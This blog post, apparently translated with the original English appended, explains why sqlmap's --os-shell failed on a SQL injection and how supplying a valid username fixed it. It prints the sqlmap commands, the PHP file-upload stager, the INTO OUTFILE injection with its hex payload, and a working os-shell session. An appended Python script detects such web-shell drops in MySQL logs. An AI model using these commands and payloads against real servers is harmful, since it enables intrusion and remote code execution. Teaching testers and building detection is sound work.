It so happened that I had a SQL injection that sqlmap could exploit, and the privileges were absurdly high: root outright. Since it was root, naturally I wanted to go straight for a shell. But simply running sqlmap -u xxx --os-shell failed:
$ sqlmap -u 'http://php.0day5.com/login.php' --data='user=josh&pass=pass' --os-shell
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[07:26:13] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search
>
[07:26:13] [WARNING] unable to retrieve automatically any web server path
[07:26:13] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[07:26:14] [WARNING] unable to upload the file stager on '/var/www'
[07:26:14] [INFO] fetched data logged to text files under '/home/0day5/.sqlmap/php.0day5.com'
[*] shutting down at 07:26:14
The injection here is error-based. The write failed, and I assumed the current directory was not writable. I tried other directories repeatedly and every one failed. After a long time trying, I got a shell by other means. Looking back at why it could not write here, I checked the permissions on the /var/www directory:
root@targetserver:/var/www# ls -l
total 48
-rw-r--r-- 1 root root 573 Jan 16 2013 alarms.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 css
-rw-r--r-- 1 root root 634 Jan 16 2013 denied.php
-rw-r--r-- 1 root root 304 Jan 16 2013 footer.php
-rw-r--r-- 1 root root 3577 Dec 5 05:47 header.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 images
-rw-r--r-- 1 root root 3516 Jan 16 2013 index.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 js
-rw-r--r-- 1 root root 424 Dec 5 07:26 login.php
-rw-r--r-- 1 root root 198 Jan 16 2013 logout.php
-rw-r--r-- 1 root root 4455 Dec 4 17:01 reports.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 06:34 tmpubhkn.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuqitu.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:26 tmpurwem.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuvkgz.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuwtqk.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 06:36 tmpuxycr.php
Seeing the files starting with tmp, we know they were created by sqlmap. The files were created, but no content was written to them. Why could nothing be written here? After thinking it over for a while, I took the SQL statement that needs to run and executed it directly on the server with the current privileges:
SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 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-- AND 'PipI'='PipI'
First, sqlmap's basic requirement: it takes my injection parameter input, josh. Next sqlmap runs the query, executing the 'LIMIT 0,1 INTO OUTFILE ...' statement. The output file name is chosen at random, and the content written is a hex-encoded string, which decodes as follows:
<?php
if (isset($_REQUEST["upload"])) {
    $dir = $_REQUEST["uploadDir"];
    if (phpversion() < '4.1.0') {
        $file = $HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
    } else {
        $file = $_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
    }
    @chmod($dir . "/" . $file, 0755);
    echo "File uploaded";
} else {
    echo "<form action=" . $_SERVER["PHP_SELF"] . " method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www> <input type=submit name=upload value=upload></form>";
}
?>
Executing it directly in mysql:
mysql> SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 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-- AND 'PipI'='PipI';
Query OK, 0 rows affected (0.00 sec)
The result is the same as with sqlmap: we get an empty file. However, the following statement is more useful:
mysql> SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1;
Empty set (0.00 sec)
Below is the original text:
Recently I was working with a basic SQLi flaw, and wanted to get OS-level access. Naturally, I turned to sqlmap's "--os-shell" feature.
$ sqlmap -u 'http://targetserver.mytarget.city.nw/login.php' --data='user=josh&pass=pass' --os-shell
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[07:26:13] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search
>
[07:26:13] [WARNING] unable to retrieve automatically any web server path
[07:26:13] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[07:26:14] [WARNING] unable to upload the file stager on '/var/www'
[07:26:14] [INFO] fetched data logged to text files under '/home/jwright/.sqlmap/targetserver.mytarget.city.nw'
[*] shutting down at 07:26:14
The server here is vulnerable to SQLi through an error-based injection, but the os-shell fails to upload the file stager. I assumed the /var/www directory was not writable by the MySQL user, tried some other directories that all failed in the same way, and moved on to other techniques. However, later I saw this in the /var/www directory:
root@targetserver:/var/www# ls -l
total 48
-rw-r--r-- 1 root root 573 Jan 16 2013 alarms.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 css
-rw-r--r-- 1 root root 634 Jan 16 2013 denied.php
-rw-r--r-- 1 root root 304 Jan 16 2013 footer.php
-rw-r--r-- 1 root root 3577 Dec 5 05:47 header.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 images
-rw-r--r-- 1 root root 3516 Jan 16 2013 index.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 js
-rw-r--r-- 1 root root 424 Dec 5 07:26 login.php
-rw-r--r-- 1 root root 198 Jan 16 2013 logout.php
-rw-r--r-- 1 root root 4455 Dec 4 17:01 reports.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 06:34 tmpubhkn.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuqitu.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:26 tmpurwem.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuvkgz.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuwtqk.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 06:36 tmpuxycr.php
The files starting with "tmpu" are the stager files created through sqlmap's os-shell feature. That they are empty explains why sqlmap returned the "unable to upload file stager" error, but since we know the "mysql" account can write here the question remains: why did sqlmap's os-shell feature fail?
Googling for similar situations brought me to Bas' post describing a similar situation. He manually created the PHP shell with "--sql-shell", but I wanted to find out why sqlmap failed.
I added a line to the vulnerable login.php script to save queries to a file. Here is what sqlmap does when os-shell is used:
SELECT * FROM user_credentials WHERE `username` = 'josh'
SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 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-- AND 'PipI'='PipI'
<?php
if (isset($_REQUEST["upload"])){$dir= $_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www> <input type=submit name=upload value=upload></form>";}?>
Terrific, this is the sqlmap stager. Still, why does it create the file, but not populate the output file? I ran the query manually from a mysql shell to examine the output:
mysql> SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- AND 'PipI'='PipI';
Query OK, 0 rows affected (0.00 sec)
OK, that SQL creates the empty file, just like sqlmap does. However, this abbreviated query turned out to be more useful:
mysql> SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1;
Empty set (0.00 sec)
DOH! I made the cardinal sin of SQL injection exploitation: I didn’t start with valid data.
In my SANS classes, I tell students: Always Start with Valid Data (when performing SQL injection). If you identify a username parameter josh' that returns a database error, that's great, but don't supply that to sqlmap. Start with the valid data of josh, and let sqlmap figure out the rest (assisting sqlmap where necessary).
The problem here, and the reason for sqlmap’s empty files, is that the injected SELECT statement doesn’t return any records, so the delimiter PHP code is never written to a file. What does work is this:
$ sqlmap -u 'http://targetserver.mytarget.city.nw/login.php' --data='user=pconnor&pass=pass' --os-shell
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[07:49:38] [WARNING] unable to retrieve automatically any web server path
[07:49:38] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[07:49:38] [INFO] the file stager has been successfully uploaded on '/var/www' - http://targetserver.mytarget.city.nw:80/tmpuiqxs.php
[07:49:38] [INFO] the backdoor has been successfully uploaded on '/var/www' - http://targetserver.mytarget.city.nw:80/tmpbubmd.php
[07:49:38] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> uname -a
do you want to retrieve the command standard output? [Y/n/a] a
command standard output: 'Linux targetserver.mytarget.city.nw 3.2.0-33-generic #52-Ubuntu SMP Thu Oct 18 16:29:15 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux'
os-shell>
Replacing my put-any-username-here "josh" reference with a valid username causes the SQL statement to return at least one record, which prompts the database to write the handler code to the file and returns an os-shell.
A valuable lesson for me, and hopefully others find it useful as well.
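A defender-side check, added here and not part of the translation or of the original post: the MySQL general query log records the injected INTO OUTFILE statement whether or not the SELECT matched any rows, so the logged statement is a more reliable signal than the resulting file, which may be empty exactly as the tmpu*.php files above were. The log lines, the short hex payload and the list of assumed document roots are constructed for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample in the style of the MySQL general query log (not from the post).
# Line 2 mimics the stager upload query, with a short placeholder hex payload
# ("<?php echo 1; ?>\n") standing in for sqlmap's real stager.
SAMPLE_LOG = """\
2013-12-05T07:26:13Z\t 12 Query\tSELECT * FROM user_credentials WHERE `username` = 'josh'
2013-12-05T07:26:14Z\t 12 Query\tSELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 0x3c3f706870206563686f20313b203f3e0a-- AND 'PipI'='PipI'
2013-12-05T07:30:00Z\t 13 Query\tSELECT name FROM reports INTO OUTFILE '/tmp/report.csv'
2013-12-05T07:31:00Z\t 14 Query\tSELECT 1
"""

OUTFILE_RE = re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\s+'([^']+)'", re.IGNORECASE)
TERMINATOR_RE = re.compile(r"(LINES|FIELDS)\s+TERMINATED\s+BY\s+0x([0-9a-fA-F]+)", re.IGNORECASE)
WEBROOTS = ("/var/www", "/srv/http", "/usr/share/nginx", "/htdocs")  # assumed document roots

@dataclass
class OutfileEvent:
    line_no: int
    path: str
    terminator: bytes        # decoded LINES/FIELDS TERMINATED BY payload, if hex-encoded
    writes_script: bool      # terminator carries a PHP open tag, as the sqlmap stager does
    in_webroot: bool

def scan_general_log(text: str) -> list:
    events = []
    for n, line in enumerate(text.splitlines(), 1):
        m = OUTFILE_RE.search(line)
        if not m:
            continue
        t = TERMINATOR_RE.search(line)
        term = bytes.fromhex(t.group(2)) if t and len(t.group(2)) % 2 == 0 else b""
        # The target file is created even when the SELECT matched no rows (the empty
        # tmpu*.php files above), so the logged statement, not the file size, is the signal.
        events.append(OutfileEvent(n, m.group(2), term,
                                   b"<?" in term, m.group(2).startswith(WEBROOTS)))
    return events

def severity(e: OutfileEvent) -> str:
    if e.writes_script and e.in_webroot:
        return "critical"   # script body written under the web root: web shell drop
    if e.writes_script or e.in_webroot:
        return "high"
    return "info"           # ordinary data export, still worth reviewing

if __name__ == "__main__":
    for e in scan_general_log(SAMPLE_LOG):
        print(f"line {e.line_no}: {severity(e):8} {e.path} {e.terminator[:20]!r}")
```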
Excerpted from: http://0cx.cc/
Original: http://www.willhackforsushi.com/?cat=12